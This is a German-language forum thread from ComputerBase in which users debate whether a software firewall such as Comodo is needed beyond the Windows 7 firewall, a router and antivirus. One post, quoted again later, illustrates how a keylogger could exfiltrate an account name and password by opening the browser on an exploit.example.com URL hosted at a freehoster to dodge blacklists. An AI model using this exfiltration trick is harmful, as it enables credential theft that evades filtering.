ComputerBase Menü
Aktuelles

Software-Firewall noch nötig ?

Derzeit rein gar nichts, ausser die übliche Überwachung der Ports die offen sind, 2 Pakete wurden gefiltert da sie manipuliert waren, kommt im übrigen oft vor wenn ich mal wieder mit Russen DoW2 spiele... tz tz
Ich hatte das Jahr zuvor Bekannschaft mit Chinesen und Türken geschlossen, wurde mir irgendwann zu blöd und das HDD Geräusch ging mir auch auf den Sack(an meiner Astaro hängt eine Raptor mit 10k rpm), da hab ich kurzerhand den gesammten Adressraum für China/Türkei für drei Monate ausgespeert. Ich kann mich auch nicht mit meiner 16 K Leitung mit einem Botnetz anlegen, ich kann aber den "Penner" sehrwohl ausperren, so das seine Datenpakte nicht mal "ankommen". Seitdem hab ich Ruhe und rauskommt nur das was ich will wann ich es will und selbst das wird überwacht/protokolliert.

Und ja ich weiss wenn es jemand drauf anlegt kommt er auch bei mir rein, nur bin ich kein Unternehmen das man erpressen könnte oder sowas und der Aufwand dann sowas wie eine Astaro bei einem Homeuser zu knacken ist dann doch zu hoch.
 
Hier hat man wieder ein gutes Beispiel was die ganzen Sicherheitsmaßnahmen bringen.

https://www.computerbase.de/news/gaming/hacker-verschaffen-sich-zugang-zu-rift-accounts.33940/

Wie zu Lesen ist kann man nicht einmal sagen wie und wann es dazu gekommen ist. Ich gehe mal davon aus das die Betreiber besser ausgestattet sind als unser einer.

Ich bleibe also bei meiner Meinung das es im Bezug auf PFW nur ein Placebomittel ist und bleibt. Sicher wird es etwas schwerer wenn man Ahnung hat und diese entsprechend konfigurieren kann. Von großem nutzen sind diese Dinger aber nur in seltenen Fällen.
 
Also kann ich getrost auf eine Firewall von Norton verzichten ( da unnötig und Win7 FW langt ) und mir stattdessen nur die Norton Anti-Virus oder Kaspersky Anti-Virus ( ohne Firewall, sprich nicht die IS Version ) holen ? btw hab kein Router, direkt zum Kabel-Modem.

mfg
doh
 
Zuletzt bearbeitet:
@Lemon with Ice
Wer redet den hier von PFW......


@dohderbert
Spar dir das Geld, MSE langt völlig als Virenschutz aus.
 
Ich besitze ein Router und benütze als Virenscanner den Anti Vir. Und das langt mir.
Das kommt immer auch drauf an was man selber im Internet macht und sich befindet. ;)
 
BeeHaa schrieb:
Gebalte Ahnung hier im Thread :) Nämlich als die letzte freie Version der Kerio sich dermassen im System gegen ihre Feinde vergraben hat, daß es mir nichtmal als Superadmin möglich war sie mit ihren eigenen Mitteln zu deinstallieren :)
Zum Vergrößern anklicken....
Daran sieht man, dass du keine Ahnung hast. Du (Hinterwäldler ;) ) testest irgendwelche Firewalls die vor 10 Jahren vielleicht gut waren und ziehst da falsche Schlüsse draus. Teste doch mal die aktuelle Comodo mit aktivierter Defense und stelle alle Automatismen ab. Ja ne Menge Arbeit ist das und du wirst viel gefragt aber es ist machbar und dann besteht das Teil auch so gut wie jeden Leaktest.
 
Zuletzt bearbeitet:
Bob.Dig schrieb:
Teste doch mal die aktuelle Comodo mit aktivierter Defense und stelle alle Automatismen ab. Ja ne Menge Arbeit ist das und du wirst viel gefragt aber es ist machbar und dann besteht das Teil auch so gut wie jeden Leaktest.
Zum Vergrößern anklicken....

Da sieht man mal wieder, das viele glauben sie hätten mit einer Software Firewall mehr Kontrolle. Ich kann ja durchaus verstehen, das man sich damit sicherer fühlt, in der Realität ist das nun leider nicht der Fall.

Die hier gehypte Comodo hat man bei der Ct unter die Lupe genommen, das Ergebnis war vernichtend.


Zu Comodo:

Trotz Microsofts Warnung schaltet die Comodo Firefall bei der Installation die Windows Firewall nicht ab. Auch nach dem Start erhält man keine Hinweise, wie man mit der vorinstallierten "Brandschutzmauer" verfahren soll.
Der Hersteller versicherte uns auf Nachfrage, dass er das zukünftig ändern wolle;
wir haben für die Tests die Windows Firewall von Hand abgeschaltet.

Allein bei der Installtion des harmlosen Editors Notepad++ überflutete es uns mit über einem Dutzend Nachfragen, die ein normaler Anwender eigentlich nicht beantworten könnte.

Den wirklich bösen PDF Exploit behinderte Comodo hingegen nicht in seiner Aktivität.

Auch ohne verdächtigen lokalen Aktivitäten bescherte uns die Comodo Firewall im Redaktionsnetz regelmäßig kryptische Warnungen über eingehende Verbindungen an svchost.exe oder allgemein das "System" die vom Domain Controller oder anderen, UPnP-fähigen Rechnern ausgingen.

Lokale Dienste schottet die Comodo Firewall effektiv vor Zugriffen aus öffentlichen Netzwerken ab - solange diese über IPv4 erfolgen. IPv6-Verkehr kann ungehindert in beide Richtungen passieren; das will der Hersteller erst in einer der nächsten Versionen ändern.
Zum Vergrößern anklicken....
 
Zuletzt bearbeitet:
-=Azrael=- schrieb:
@Lemon with Ice
Wer redet den hier von PFW......
Zum Vergrößern anklicken....

Ist das eine Einladung für mich oder warum stellst du ein Bildchen von deinem Astaro Security Gateway 8.200 hier ein ?

Denkst du du bist sicher nur weil du einen alten PC zwischen hängen hast ? Dann viel Spaß beim Träumen.
 
Boogeyman schrieb:
Da sieht man mal wieder, das viele glauben sie hätten mit einer Software Firewall mehr Kontrolle. Ich kann ja durchaus verstehen, das man sich damit sicherer fühlt, in der Realität ist das nun leider nicht der Fall.

Die hier gehypte Comodo hat man bei der Ct unter die Lupe genommen, das Ergebnis war vernichtend.
Zum Vergrößern anklicken....
Seit wann haben ct 'Redakteure Ahnung von Security? Und was hat ein pdf exploit mit einer Firewall zu tun? Comodo ist in erster Linie die beste PFW, damals mit einem grottigen AV in der IS, der wohl langsam besser wird.
Die Windwos Firewall lasse ich übrigens auch an, weil sie mir für das LAN besser gefällt als die Comodo, und?
Sie ist mächtig und stellt je nach dem wie sie eingestellt ist viele Fragen, das tat Threadfire auch, als ich es mir angeguckt habe. Alles natürlich eine Einstellungssache und ich hab nicht gesagt, dass es ein Kinderspiel sei sie zu bedienen. Statt von Hörensagen solltest du sie dir vielleicht selbst mal angucken. Und wo ist eigentlich das Problem wenn man so etwas bewusst nutzen will oder muss? Ihr kapiert das irgendwie nicht, dass manche Leute ein Bedarf haben gewissen Programmen den Zugriff aufs Netz zu verwehren. :hammer_alt:
 
Bob.Dig schrieb:
Seit wann haben ct 'Redakteure Ahnung von Security?
Zum Vergrößern anklicken....
Stimmt, du bist dir Experte genug und natürlich schlauer als der Rest. :rolleyes:

Bob.Dig schrieb:
Und was hat ein pdf exploit mit einer Firewall zu tun?
Zum Vergrößern anklicken....
Weil dieser Kontakt zu einen Server aufnehmen wollte und das Comodo nicht gemeldet hat, vielleicht? Aber stimmt, Comodo ist die beste PFW und es kann natürlich nicht sein, was aus deiner Sicht nicht seien darf.

Zur Programm Kontrolle gibt es z.b. Windows 7 Firewall Control, ein Aufsatz auf die Windows Firewall. Wobei du damit natürlich nicht kontrollieren kannst, was denn nun gesendet wird, sondern nur ja oder nein. Wer Programmen wirklich misstraut, sollte sie erst überhaupt nicht installieren; ist oft die bessere Lösung.
 
Bob.Dig schrieb:
Ihr kapiert das irgendwie nicht, dass manche Leute ein Bedarf haben gewissen Programmen den Zugriff aufs Netz zu verwehren.
Zum Vergrößern anklicken....

Diese Leute haben aber entweder eine übertriebene Paranoia oder ihre Software ist bestenfalls "vom Laster gefallen". Einen Schutz vor Schädlingen kann eine PFW nicht leisten.

Theoretisch wäre auch eine PFW für eingehende Verbindungen unnötig, wenn das System selbst richtig und sicher konfiguriert wäre... (keine unnötigen oder unsicheren Dienste aktiv) aber das bleibt wohl ein Traum für die ferne Zukunft, bis dahin ist die Windows Firewall ganz praktisch.


Wenn ein Schädling auf dem System ist und Daten raus senden will ist es schon lange zu spät... und Notfall starte ich als Keylogger einfach deinen Default-Browser mit der URL http://exploit.example.com/getdata.php&d=DEINUSERACCOUNT;p=DEINPASSWORT und hab was ich brauch... (als Host irgendeine verbreiteten Freehoster nehmen, der wird schon nicht in ner Blacklist stecken)


Das System selbst kann (technisch gesehen) nur ein On-Access Viren-Scanner schützen, der verhindert, das der Schädling überhaupt erst startet. Evtl. noch solche Tools wie Threatfire die den Prozess abschießen bevor er was schlimmes macht, wenn er anhand von Mustern auffällt.
 
Boogeyman schrieb:
Weil dieser Kontakt zu einen Server aufnehmen wollte und das Comodo nicht gemeldet hat, vielleicht? Aber stimmt, Comodo ist die beste PFW und es kann natürlich nicht sein, was aus deiner Sicht nicht seien darf.
Zum Vergrößern anklicken....
Ich kenne den Artikel nicht und muss mich daher auf deine Angaben verlassen. Welche andere Firewall hätte das denn verhindern können? Ein Exploit für ein Programm, welches bereits auf das Internet zugreifen darf, ist wohl von keiner Firewall zu verhindern. Hier liegt der Fehler bei Adobe. Das wäre faktisch das gleiche, als wenn ich ein Bookmark aufrufe und der Browser, der grundsätzlich Zugriff aufs Internet hat, ruft auch diese Seite auf, so what? Gerade zu lächerlich, hier wollte der Autor wohl seine Zielgruppe bedienen...
Boogeyman schrieb:
Zur Programm Kontrolle gibt es z.b. Windows 7 Firewall Control, ein Aufsatz auf die Windows Firewall. Wobei du damit natürlich nicht kontrollieren kannst, was denn nun gesendet wird, sondern nur ja oder nein.
Zum Vergrößern anklicken....
Was gesendet wird kann man nie kontrollieren. Die Windows Firewall bietet keine hinreichende Kontrolle für ausgehende Verbindungen und würde keinen einzigen Leaktest bestehen, von daher ändert sie ja nichts an eurer Kritik. Sie ist daher die "schlechteste" Firewall, aber bei ct ist sie die beste... :freak:
Jesterfox schrieb:
Diese Leute haben aber entweder eine übertriebene Paranoia oder ihre Software ist bestenfalls "vom Laster gefallen". Einen Schutz vor Schädlingen kann eine PFW nicht leisten.
Zum Vergrößern anklicken....
Jede Firewall hilft, und wenn es nur das Abweisen von nicht angeforderten Paketen ist. Zusätzlich kann sie auch gegen Schädlinge im System helfen, banal z.B. gegen Dropper. Aber wie gesagt, es geht nicht um Schädlinge im System, dann nämlich ist format c: gefragt. Vom Laster gefallene Software ist sicher einer der Hauptgründe, warum man eine PFW anstatt der von Win verwendet, da gebe ich dir mal Recht.
 
Zuletzt bearbeitet:
@dohderbert
Naja... Für dich bedeutet dieser Thread eigentlich garnichts, da ohne einen Router/Switch mit einer Firewall (bzw. Firmware) von mind. der Quali einer Fritzbox die Verbindung zum Internet sicherheitstechnisch keine sinnvolle Lösung ergibt.

Bob.Dig schrieb:
Daran sieht man, dass du keine Ahnung hast. Du (Hinterwäldler ;) ) testest irgendwelche Firewalls die vor 10 Jahren vielleicht gut waren und ziehst da falsche Schlüsse draus.
Zum Vergrößern anklicken....
Übertragen auf das Lesen der Beiträge: Warum hörst du erstmal nicht einfach nur zu, du Abgesandter der snake-oil-industry? ;)
Ich schrieb, ich teste solche Soft immerweider mal und mein letztes "Aha" galt der Kerio. Das steht da klar und deutlich. Wo steht da nochmal all das beschrieben was du meinst herausgelesen zu haben? Meinst du nicht das ist eine Polemik der primitiveren Art?

In solchen Fällen frag ich mich ja immer, ob man überhaupt einen Deut Aufmerksamkeit Beiträgen solcher Leute zukommen lassen sollte, die vorab mit ihrem Grips nicht von alleine soweit kommen bzw. ihre begrenzten Resources bei Meinungsverschiedenheiten lieber sofort eben in derartige Polemik stecken. Und das auch noch wiederholt völlig frei von jeglichen technischen Erklärungen.

Da bekomm ich doch direkt ein Dejavu
http://www.youtube.com/watch?v=YCtpFKHrH_k
 
Zuletzt bearbeitet:
@Lemon with Ice
*Gähn* Kannst es gerne versuchen. Ich würde dir aber mal den Spruch von Nuhr an Herz legen, lesen kannst du auch nicht, da steht 8.201 abgesehen vom Aufnahmedatum...... Ich geb dir noch ein Tip ich hab intern ein Klasse C Netz falls du überhaupt weisst was da ist. Also auf auf ......
ymmd. ;)
 
Bob.Dig schrieb:
Ein Exploit für ein Programm, welches bereits auf das Internet zugreifen darf, ist wohl von keiner Firewall zu verhindern. Hier liegt der Fehler bei Adobe. Das wäre faktisch das gleiche, als wenn ich ein Bookmark aufrufe und der Browser, der grundsätzlich Zugriff aufs Internet hat, ruft auch diese Seite auf, so what? Gerade zu lächerlich, hier wollte der Autor wohl seine Zielgruppe bedienen...
Zum Vergrößern anklicken....
Du liest auch nur das, was du lesen willst. :rolleyes: Schau einfach mal auf das, was Jesterfox geschrieben hat.(siehe unten) Viele Malware bedient sich über die Berechtigungen des Browsers. Sonst kommen diverse Software Firewalls, wie schon erwähnt, von Leuten ins Spiel, die ihr gecracktes Photoshop am Heim telefonieren hindern möchten. Das ist dann pervers hoch zehn, erst ein Loblieb auf die Kontrolle des Rechners singen, dann aber Software aus dubiosen Quellen mit Cracks installieren.
und die Windows Firewall ist auch deswegen besser, weil sie nicht wie Dritt Firewalls oft neue; dauerhaft ansprechbare Sicherheitslücken öffnet, bei IPv6 nicht blind ist und zwischen privaten und öffentlichen Netzwerken unterscheiden kann.


Jesterfox schrieb:
Wenn ein Schädling auf dem System ist und Daten raus senden will ist es schon lange zu spät... und Notfall starte ich als Keylogger einfach deinen Default-Browser mit der URL http://exploit.example.com/getdata.php&d=DEINUSERACCOUNT;p=DEINPASSWORT und hab was ich brauch... (als Host irgendeine verbreiteten Freehoster nehmen, der wird schon nicht in ner Blacklist stecken)
Zum Vergrößern anklicken....
 
Zusätzlich zur HW-firewall hatte ich vor Windows 7 die Freeware-Versionen von ZoneAlarm und später Comodo installiert. Als Virenscanner/Spyware hatte ich avira und SpyBot.

Jetzt benutze ich die Windows7-Firewall, avast und SpyBot.
 
Boogeyman schrieb:
Du liest auch nur das, was du lesen willst. :rolleyes: Schau einfach mal auf das, was Jesterfox geschrieben hat.(siehe unten) Viele Malware bedient sich über die Berechtigungen des Browsers. Sonst kommen diverse Software Firewalls, wie schon erwähnt, von Leuten ins Spiel, die ihr gecracktes Photoshop am Heim telefonieren hindern möchten. Das ist dann pervers hoch zehn, erst ein Loblieb auf die Kontrolle des Rechners singen, dann aber Software aus dubiosen Quellen mit Cracks installieren.
und die Windows Firewall ist auch deswegen besser, weil sie nicht wie Dritt Firewalls oft neue; dauerhaft ansprechbare Sicherheitslücken öffnet, bei IPv6 nicht blind ist und zwischen privaten und öffentlichen Netzwerken unterscheiden kann.
Zum Vergrößern anklicken....
Noch mal, es geht nicht in erster Linie um Malware, wer so was drauf hat= format C:. Leider hast du es immer noch nicht verstanden, Programme die andere Programme nutzen wollen um ins Netz zu kommen werden daran gehindert durch Defense oder wie immer das auch bei den Herstellern heißen mag (Verhaltenskontrolle, Pro Aktiver Schutz, what ever). Auch ein Keylogger ist i.d.R. ein Prog und kann daher gehindert werden. Nur der pdf.Exploit ist ja selbst kein Programm und ich vermute einfach, der Reader hatte für den Update Check bereits die Freigabeerlaubnis. Das kann die Firewall dann natürlich nicht verhindern. Einen 100 Prozentigen Schutz gibt es ohnehin nicht, das sollte jedem klar sein. Ich kann mir Adobe Photoshop nicht leisten, nutze es aber auch nicht. ;)

Alles was du zuletzt sagst kann auch Comodo. Außer die permanenten neuen Sicherheitslücken, die angeblich aufgerissen werden, dazu kann ich nichts sagen. Nur weil das vielleicht mal bei einem Hersteller vorgekommen sein mag, zuletzt war sogar die Win Firewall in Verdacht, ist das sicher nicht zu verallgemeinern.
 
Zuletzt bearbeitet:
Also für den „Otto-normal-Verbraucher“ ist die Windows-Firewall sicher die beste unter all den DFW´s. Falls kein Router verfügbar ist, kann man damit prima den Rechner vor Angriffen von außen absichern. Für mehr ist sie nicht gedacht.


Zu den (immer häufig zitierten) snake-oil: Ja, für eine DFW, die ausschließlich den Netzwerkverkehr einzelner Programme kontrollieren will, gilt dies ganz ohne Zweifel. Was diese Schlangenöl-Theorie-Verfechter allerdings vergessen (oder schlicht nicht wissen), ist die Tatsache, dass einige DFW´s HIPS-Funktionen bereitstellen, die einem erfahrenen Anwender praktisch die Kontrolle über das System gibt.


Die Firewall von Comodo ist eine solche. Auch viele KIS-Nutzer wären sicherlich überrascht zu hören, dass bei ihnen ein vollwertiges HIPS arbeitet, was nicht zuletzt daran liegt, dass es dem Anwender die meisten Entscheidungen abnimmt. Auch wenn mir persönlich deren Automatismen zu weit gehen, es ist immerhin ein Versuch seitens Kaspersky, das HIPS massenkompatibel zu machen.


Eine HIPS-Firewall-Kombi wie die von Comodo ist gewiss kein „Schlangenöl“ sondern in den Händen eines erfahrenen Anwenders, der ein HIPS zu bedienen weiß, eine äußerst wirksame Waffe gegen jeglicher Art von schädlichen Systemveränderungen.
Leider wird das häufig übersehen. Ist eben schwierig, wenn nur Firewall draufsteht, obwohl mehr drin ist …


So leistungsfähig das Comodo HIPS auch ist, es soll trotzdem noch erwähnt werden, dass dem Geschäftsgebaren dieser Firma durchaus mit Skepsis zu begegnen ist. Sei es die immer wieder gleiche Maulerei, dass Comodo in Tests keine Beachtung findet (und wenn sie dann in Tests schlecht abschneiden, ist dieser natürlich gefaked) oder die Integration von Toolbars. Für mich am schwerwiegendsten ist jedoch der Fakt, dass bereits mehrfach von Comodo´s Partnerunternehmen Zertifikate für Malware-Autoren vergeben gestohlen wurden.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

B
Fragen zu Software-Firewalls (Windows) - Detaillierte Konfiguration möglich?
Antworten
8
Aufrufe
920
chrigu
chrigu
lhinny
Beste Freeware Software Firewall
2 3 4
Antworten
65
Aufrufe
7.237
Tenchi Muyo
Tenchi Muyo
B
FRITZ!Box 7270 Firewall und Windows 7 Firewall - beides nötig?
Antworten
11
Aufrufe
7.250
SEL33
S
N
suche einfache software firewall
Antworten
6
Aufrufe
1.590
Excelmania
E
N
Win XP Software Firewall?
Antworten
5
Aufrufe
1.819
Jesterfox
Jesterfox
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 160 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz